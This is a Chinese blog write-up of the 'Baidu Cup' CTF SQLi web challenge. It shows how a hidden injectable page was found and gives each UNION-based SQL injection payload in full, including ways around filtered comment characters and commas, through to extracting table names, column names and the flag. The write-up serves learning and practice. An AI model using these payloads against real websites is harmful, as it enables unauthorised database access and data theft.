首页 > 数据库 >“百度杯”CTF比赛 九月场-SQLi

“百度杯”CTF比赛 九月场-SQLi

时间:2024-04-06 21:34:24浏览次数:13  
标签:23 union flag SQLi CTF 百度 SQL id select

“百度杯”CTF比赛 九月场

SQLi:

题目类型:web

题目描述:后台有获取flag的线索,打开靶机得到一个空白的页面:

解题方法:我们得到一个空白的页面,先查看一下网页源码:

得到一条有用的信息,我们访问一下 login.php?id=1 :

在这里进行了各种各样的注入,都没有发现注入点,找不到任何思路,用dirseach来扫一下看看

没有扫出什么有用的东西,用burp来进行抓包看一下:

试着访问index.php看看

这里得到一个url,一眼看上去和开始的那个url一样,但是仔细发现中间有点不一样

./b68a89d1c4a097a9d863 1 b3ac45e8979.php
./b68a89d1c4a097a9d863 l b3ac45e8979.php
一个是1,一个是l

我们访问一下./b68a89d1c4a097a9d863lb3ac45e8979.php:

这里发生了302重定向,而且在消息头page这里发现了l0gin.php?id=1,这里感觉这个可能才是真正的注入点

我们访问l0gin.php?id=1看一下:

果然这里才是SQL真正的注入的地方

我们输入?id=2看一下:

现在来进行SQL注入,第一步先判断一下SQL注入类型:

我们输入?id=2-1看一下它会不会返回id=1的界面,会的话则说明是数字型注入:

不会,说明不是数字型,说明应该是字符型,用单引号来闭合一下试试:

说明是字符型,而且可以用SQL联合注入的方式来进行注入,这里的%23是注释符号#的URL编码,因为在这里输入#和--+都无法进行注释可能被过滤了,就用#的URL编码来试一下,也可以用(--(空格)+一个字符)例如:-- a 这样也可以绕过

第二步判断它的字段数:

?id=1' order by 1%23
?id=1' order by 2%23
?id=1' order by 3%23

当字段为3的时候返回错误,说明只有两个字段

第三步判断它的显示位:

?id=1' union select 1,2%23

返回不正常的页面,我们看一下它返回的信息,发现它把逗号以及后面的内容都过滤了,所以我们要把逗号给它绕过去,在网上查了一下SQL注入逗号被过滤的方法,发现可以用 a join 来进行绕过:

union select 1,2
等价于:
union select * from (select 1)a join (select 2)b

paylaod:

?id=-1' union select * from (select 1)a join (select 2)b%23

这里我们知道它的两个显示位我们都可以利用:

第四步:爆出它的数据库名:

payload:

?id=-1' union select * from (select 1)a join (select database())b %23

第五步:爆出它数据库里面的表名:

paylaod:

?id=-1' union select * from (select 1)a join (select group_concat(table_name) from information_schema.tables where table_schema='sqli')b %23

第六步:爆出它表中的字段名:

payload:

?id=-1' union select * from (select 1)a join (select group_concat(column_name) from information_schema.columns where table_name='users')b %23

爆出了表中所有的字段名,我们看到了敏感信息flag

最后一步,查出flag字段中对应的flag的值:

paylaod:

?id=-1' union select * from (select 1)a join (select group_concat(flag_9c861b688330) from users)b %23

得到了我们要的flag:

flag{d5d3c7bd-e44f-4c2b-af9a-1f2d29e47d9f}

总结:这一次学到了SQL注入时注释符号被过滤时绕过的方法和SQL语句中的逗号被过滤了如何进行绕过!

标签:23,union,flag,SQLi,CTF,百度,SQL,id,select
From: https://www.cnblogs.com/xyweiwen/p/18117960

相关文章

  • buuctf-misc-荷兰宽带数据泄露
    解压后是个conf.bin文件,010editor打开没有发现什么隐藏信息、熟悉的文件头之后了解到一个新工具,RouterPassView这是下载地址:https://www.nirsoft.net/utils/router_password_recovery.html可以同时下载到中文翻译包利用这个工具打开conf.bin搜索flag、username、password等......
  • buuctf-misc-九连环
    解压后发现一张图片,详细信息里面没内容,用010editor打开发现图片后面隐藏了一个压缩包,提取出压缩包压缩包其中一个文件加密了,再用010editor打开,将目录区的01改为00去除伪加密解压,得到一张图片与一个压缩包,压缩包有密码,试了不是伪加密那么只能从图片入手了,详细信息没有内容,十六......
  • buuctf-misc-snake
    打开压缩包,是张图片,详细信息里没有东西,用010editor看看有没有隐藏东西后面藏了个压缩包,保存下来,没有密码,解压得到两个文件一个密文文件,一个密钥文件密钥经base64解码后得到WhatisNickiMinaj'sfavoritesongthatreferstosnakes?使用万能的搜索引擎得到答案anaconda......
  • CTF wed安全 (攻防世界)练习题
    一、disabled_button步骤一:进入网站发现按钮按不了步骤二:按F12会查看源代码,会发现disableddisable属性在HTML中,disabled属性只有两个值:一个是不带值(例如:disabled),表示禁用该元素;另一个是带有任意非空值(例如:disabled="true"),表示禁用该元素并将其状态提交到服务端。如果......
  • 百度小程序发帖软件怎么优化SEO排名关键词
    百度小程序发帖软件怎么优化SEO排名关键词手把手教你,如何做SEO关键词优化?!#官网建站#seo#百度排名2024创业好项目:做H5响应式建站代理!排名展示推荐阅读:百度小程序发帖外推软件是什么百度不收录我们的网站怎么办呢?网站SEO优化一定要做好,今天咱们说说网站SEO优化的三......
  • 花式栈溢出 CTFshowpwn88
    花式栈溢出在这之前确实对这方面了解很少,一般这种花式栈溢出不仅仅要求你能发现漏洞,最主要的是你要有随机应变的能力这个题是一个64位的题目看一下保护canary和nx保护都开了,我们用ida打开看一下那么程序主要是要你给一个地址和一个值,他会把你给的值放入你给的地址里面,然后......
  • CTF 之Zhuanxv
    拿到题目进行目录遍历发现有一个/list文件 打开/list文件,发现是一个登录界面 尝试过爆破,毫无疑问不可能成功。刷新页面,抓包,然后放一个包,发现又发了一个请求。GET/loadimage?fileName=web_login_bg.jpgHTTP/1.1通过/loadimage?fileName=web_login_bg.jpg拿到了图片......
  • 如何不安装客户端下载百度网盘的文档(以PDF为例)
    百度网盘是目前使用比较广泛的网盘,很多方面,人们都会使用百度网盘来传输资料,由于不占用本地空间,因此比较方便,但是,令我们比较头疼的方面就是,只要文件大一点,便会出现如下情景:这种强制下载给用户的体验感十分不好,那么有什么办法绕过呢?方法是有的,作者不久前摸索出,以下内容,以pdf文件为......
  • ctfshow--红包一 ob混淆
    上来是一段混淆的ob混淆的js代码,还会有个setinterval无限debugger反调试点击查看代码function_0x51ba(){const_0x4b06d7=['padding:100px\x20120px;\x20font-size:\x200;\x20background:url(\x22','%c\x20','4794822nLKJYA',......
  • ctfshow--红包题第二弹 临时文件命令执行
    上来先代码审计点击查看代码<?phpif(isset($_GET['cmd'])){$cmd=$_GET['cmd'];highlight_file(__FILE__);if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){die("cerror");......